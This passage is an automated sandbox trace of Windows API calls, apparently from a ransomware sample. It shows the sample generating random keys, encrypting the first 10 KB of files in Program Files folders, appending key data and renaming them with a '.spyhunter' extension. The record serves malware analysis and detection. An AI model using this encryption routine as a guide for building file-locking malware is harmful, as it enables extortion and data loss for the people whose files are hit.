[0113.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0113.858] GetProcessHeap () returned 0x2c0000 [0113.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cca998 | out: hHeap=0x2c0000) returned 1 [0113.862] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f730 | out: pbBuffer=0x270f730) returned 1 [0113.863] GetProcessHeap () returned 0x2c0000 [0113.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0113.863] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270f728*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270f728*=0x30) returned 1 [0113.863] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\logo.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\logo.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.914] GetProcessHeap () returned 0x2c0000 [0113.914] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0113.914] GetProcessHeap () returned 0x2c0000 [0113.914] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc3608 | out: hHeap=0x2c0000) returned 1 [0113.980] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f720 | out: pbBuffer=0x270f720) returned 1 [0113.980] GetProcessHeap () returned 0x2c0000 [0113.980] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0113.980] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f718*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f718*=0x30) returned 1 [0113.980] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\1.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\1.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.987] GetProcessHeap () returned 0x2c0000 [0113.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0113.987] GetProcessHeap () returned 0x2c0000 [0113.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ccca80 | out: hHeap=0x2c0000) returned 1 [0113.988] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f718 | out: pbBuffer=0x270f718) returned 1 [0113.988] GetProcessHeap () returned 0x2c0000 [0113.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0113.988] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f710*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f710*=0x30) returned 1 [0113.988] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\icon.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\icon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.989] GetProcessHeap () returned 0x2c0000 [0113.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0113.989] GetProcessHeap () returned 0x2c0000 [0113.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc3a40 | out: hHeap=0x2c0000) returned 1 [0113.993] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f710 | out: pbBuffer=0x270f710) returned 1 [0113.993] GetProcessHeap () returned 0x2c0000 [0113.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0113.993] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f708*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f708*=0x30) returned 1 [0113.993] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\weather.html" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\en-us\\weather.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.994] GetProcessHeap () returned 0x2c0000 [0113.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0113.994] GetProcessHeap () returned 0x2c0000 [0113.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e34a00 | out: hHeap=0x2c0000) returned 1 [0113.994] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f710 | out: pbBuffer=0x270f710) returned 1 [0113.994] GetProcessHeap () returned 0x2c0000 [0113.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0113.994] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f708*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f708*=0x30) returned 1 [0113.994] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\settings.html" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\en-us\\settings.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0114.002] GetProcessHeap () returned 0x2c0000 [0114.002] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0114.002] GetProcessHeap () returned 0x2c0000 [0114.002] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ccc128 | out: hHeap=0x2c0000) returned 1 [0114.002] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f708 | out: pbBuffer=0x270f708) returned 1 [0114.002] GetProcessHeap () returned 0x2c0000 [0114.002] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0114.002] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f700*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f700*=0x30) returned 1 [0114.002] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\en-US\\js\\localizedStrings.js" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\en-us\\js\\localizedstrings.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0114.058] GetProcessHeap () returned 0x2c0000 [0114.058] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0114.058] GetProcessHeap () returned 0x2c0000 [0114.058] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x2c0000) returned 1 [0114.075] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f700 | out: pbBuffer=0x270f700) returned 1 [0114.075] GetProcessHeap () returned 0x2c0000 [0114.075] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0114.075] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f6f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f6f8*=0x30) returned 1 [0114.075] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_snow.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_gray_snow.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0114.089] GetProcessHeap () returned 0x2c0000 [0114.089] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0114.089] GetProcessHeap () returned 0x2c0000 [0114.089] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e53360 | out: hHeap=0x2c0000) returned 1 [0114.089] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f6f8 | out: pbBuffer=0x270f6f8) returned 1 [0114.089] GetProcessHeap () returned 0x2c0000 [0114.090] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0114.090] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f6f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f6f0*=0x30) returned 1 [0114.090] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\undocked_gray_hail.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\undocked_gray_hail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0114.122] GetProcessHeap () returned 0x2c0000 [0114.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0114.122] GetProcessHeap () returned 0x2c0000 [0114.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e53160 | out: hHeap=0x2c0000) returned 1 [0114.122] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f6f8 | out: pbBuffer=0x270f6f8) returned 1 [0114.122] GetProcessHeap () returned 0x2c0000 [0114.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0114.122] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f6f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f6f0*=0x30) returned 1 [0114.122] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AGM.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\agm.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0114.142] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AGM.dll") returned 59 [0114.142] StrStrW (lpFirst="AGM.dll", lpSrch=".txt") returned 0x0 [0114.142] GetProcessHeap () returned 0x2c0000 [0114.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0114.142] ReadFile (in: hFile=0xec, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f6b4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f6b4*=0x2800, lpOverlapped=0x0) returned 1 [0114.340] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0114.340] WriteFile (in: hFile=0xec, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f6b4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f6b4*=0x2800, lpOverlapped=0x0) returned 1 [0114.340] GetProcessHeap () returned 0x2c0000 [0114.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0114.340] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.340] WriteFile (in: hFile=0xec, lpBuffer=0x270f6f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f6b4, lpOverlapped=0x0 | out: lpBuffer=0x270f6f4*, lpNumberOfBytesWritten=0x270f6b4*=0x4, lpOverlapped=0x0) returned 1 [0114.564] WriteFile (in: hFile=0xec, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f6b4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f6b4*=0x30, lpOverlapped=0x0) returned 1 [0114.565] CloseHandle (hObject=0xec) returned 1 [0114.565] GetProcessHeap () returned 0x2c0000 [0114.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e66ef0 [0114.571] wnsprintfW (in: pszDest=0x2e66ef0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AGM.dll.spyhunter") returned 69 [0114.571] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AGM.dll" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\agm.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\AGM.dll.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\agm.dll.spyhunter")) returned 1 [0114.571] GetProcessHeap () returned 0x2c0000 [0114.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e66ef0 | out: hHeap=0x2c0000) returned 1 [0114.572] GetProcessHeap () returned 0x2c0000 [0114.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0114.572] GetProcessHeap () returned 0x2c0000 [0114.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d087c8 | out: hHeap=0x2c0000) returned 1 [0114.572] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f6f0 | out: pbBuffer=0x270f6f0) returned 1 [0114.572] GetProcessHeap () returned 0x2c0000 [0114.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0114.572] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f6e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f6e8*=0x30) returned 1 [0114.572] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HUN\\eula.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\hun\\eula.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0114.572] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HUN\\eula.ini") returned 70 [0114.572] StrStrW (lpFirst="eula.ini", lpSrch=".txt") returned 0x0 [0114.573] GetProcessHeap () returned 0x2c0000 [0114.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0114.573] ReadFile (in: hFile=0xec, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f6ac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f6ac*=0x4a4, lpOverlapped=0x0) returned 1 [0114.582] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffb5c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0114.582] WriteFile (in: hFile=0xec, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x4a4, lpNumberOfBytesWritten=0x270f6ac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f6ac*=0x4a4, lpOverlapped=0x0) returned 1 [0114.582] GetProcessHeap () returned 0x2c0000 [0114.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0114.582] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.583] WriteFile (in: hFile=0xec, lpBuffer=0x270f6ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f6ac, lpOverlapped=0x0 | out: lpBuffer=0x270f6ec*, lpNumberOfBytesWritten=0x270f6ac*=0x4, lpOverlapped=0x0) returned 1 [0114.583] WriteFile (in: hFile=0xec, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f6ac, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f6ac*=0x30, lpOverlapped=0x0) returned 1 [0114.583] CloseHandle (hObject=0xec) returned 1 [0114.583] GetProcessHeap () returned 0x2c0000 [0114.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e66ef0 [0114.583] wnsprintfW (in: pszDest=0x2e66ef0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HUN\\eula.ini.spyhunter") returned 80 [0114.583] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HUN\\eula.ini" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\hun\\eula.ini"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\HUN\\eula.ini.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\hun\\eula.ini.spyhunter")) returned 1 [0114.584] GetProcessHeap () returned 0x2c0000 [0114.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e66ef0 | out: hHeap=0x2c0000) returned 1 [0114.584] GetProcessHeap () returned 0x2c0000 [0114.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0114.584] GetProcessHeap () returned 0x2c0000 [0114.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e3e6b0 | out: hHeap=0x2c0000) returned 1 [0114.584] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f6f0 | out: pbBuffer=0x270f6f0) returned 1 [0114.584] GetProcessHeap () returned 0x2c0000 [0114.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0114.584] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f6e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f6e8*=0x30) returned 1 [0114.584] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\JPN\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\jpn\\license.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0114.585] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\JPN\\license.html") returned 74 [0114.585] StrStrW (lpFirst="license.html", lpSrch=".txt") returned 0x0 [0114.585] GetProcessHeap () returned 0x2c0000 [0114.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0114.585] ReadFile (in: hFile=0xec, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f6ac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f6ac*=0x2800, lpOverlapped=0x0) returned 1 [0114.713] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0114.714] WriteFile (in: hFile=0xec, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f6ac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f6ac*=0x2800, lpOverlapped=0x0) returned 1 [0114.714] GetProcessHeap () returned 0x2c0000 [0114.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0114.714] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.714] WriteFile (in: hFile=0xec, lpBuffer=0x270f6ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f6ac, lpOverlapped=0x0 | out: lpBuffer=0x270f6ec*, lpNumberOfBytesWritten=0x270f6ac*=0x4, lpOverlapped=0x0) returned 1 [0114.754] WriteFile (in: hFile=0xec, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f6ac, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f6ac*=0x30, lpOverlapped=0x0) returned 1 [0114.754] CloseHandle (hObject=0xec) returned 1 [0114.834] GetProcessHeap () returned 0x2c0000 [0114.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e56ea8 [0114.834] wnsprintfW (in: pszDest=0x2e56ea8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\JPN\\license.html.spyhunter") returned 84 [0114.834] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\JPN\\license.html" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\jpn\\license.html"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\JPN\\license.html.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\jpn\\license.html.spyhunter")) returned 1 [0114.896] GetProcessHeap () returned 0x2c0000 [0114.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e56ea8 | out: hHeap=0x2c0000) returned 1 [0114.896] GetProcessHeap () returned 0x2c0000 [0114.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0114.896] GetProcessHeap () returned 0x2c0000 [0114.896] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e366e0 | out: hHeap=0x2c0000) returned 1 [0114.897] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f6e8 | out: pbBuffer=0x270f6e8) returned 1 [0114.897] GetProcessHeap () returned 0x2c0000 [0114.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0114.897] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f6e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f6e0*=0x30) returned 1 [0114.897] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\WebLink.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\weblink.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0114.898] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\WebLink.CZE") returned 76 [0114.898] StrStrW (lpFirst="WebLink.CZE", lpSrch=".txt") returned 0x0 [0114.898] GetProcessHeap () returned 0x2c0000 [0114.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0114.898] ReadFile (in: hFile=0x120, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f6a4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f6a4*=0x2800, lpOverlapped=0x0) returned 1 [0114.907] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0114.907] WriteFile (in: hFile=0x120, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f6a4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f6a4*=0x2800, lpOverlapped=0x0) returned 1 [0114.907] GetProcessHeap () returned 0x2c0000 [0114.907] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0114.907] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0114.907] WriteFile (in: hFile=0x120, lpBuffer=0x270f6e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f6a4, lpOverlapped=0x0 | out: lpBuffer=0x270f6e4*, lpNumberOfBytesWritten=0x270f6a4*=0x4, lpOverlapped=0x0) returned 1 [0114.932] WriteFile (in: hFile=0x120, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f6a4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f6a4*=0x30, lpOverlapped=0x0) returned 1 [0114.932] CloseHandle (hObject=0x120) returned 1 [0114.932] GetProcessHeap () returned 0x2c0000 [0114.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e7af38 [0114.932] wnsprintfW (in: pszDest=0x2e7af38, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\WebLink.CZE.spyhunter") returned 86 [0114.932] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\WebLink.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\weblink.cze"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\WebLink.CZE.spyhunter" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\weblink.cze.spyhunter")) returned 1 [0114.933] GetProcessHeap () returned 0x2c0000 [0114.933] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7af38 | out: hHeap=0x2c0000) returned 1 [0114.933] GetProcessHeap () returned 0x2c0000 [0114.933] HeapFree (in: 